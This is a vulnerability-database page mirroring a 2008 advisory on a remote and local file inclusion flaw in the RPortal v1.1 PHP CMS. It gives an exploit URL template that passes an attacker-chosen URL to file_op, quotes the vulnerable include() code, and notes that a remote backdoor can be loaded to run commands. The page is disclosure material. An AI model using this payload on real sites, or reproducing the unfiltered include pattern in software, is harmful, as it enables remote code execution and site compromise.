Lucene search

rportal-rfilfi.txt

🗓️ 01 Oct 2008 00:00:00Reported by KadType

packetstorm🔗 packetstormsecurity.com👁 15 Views

RPortal v1.1 content management system, Remote and Local File Inclusion Vulnerabilit

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`#########################################################  
#  
# RPortal v1.1  
#  
#  
# Rportal is a management system of contents simple and powerful Web,  
# enabling you to create your site in a few minutes, while profiting   
# from a complete and effective administration.  
#  
#  
# Remote and Local File Inclusion Vulnerability <= 1.1  
# Found the 29th September 2008  
  
##########################################################  
# Author: Kad  
#   
# mail : kadfrox [ a ] gmail [ dot ] com   
#  
##########################################################  
#  
# script : RPortal v 1.1  
# http://www.rportal.org/?op=download&fid=36  
#  
##########################################################  
  
[~] Exploit :  
  
  
http://www.site.com/index.php?file_op=[url]  
  
#  
# Vulnerable code source :   
#  
  
if(!isset($file_op))$file_op='';  
  
if($file_op!="")  
  
{  
$op_basepath = trim(strrev(strstr(strrev($file_op),"/php/")));  
  
if($op_basepath!='') $op_basepath = str_replace("/php/", "/", $op_basepath);  
  
include($file_op);   
  
}  
  
# The problem is that the variable $file_op is not filtered  
# Then, you can put the link that you want, like your own backdoor  
# and execute commands.  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

01 Oct 2008 00:00Current

7.4High risk

Vulners AI Score7.4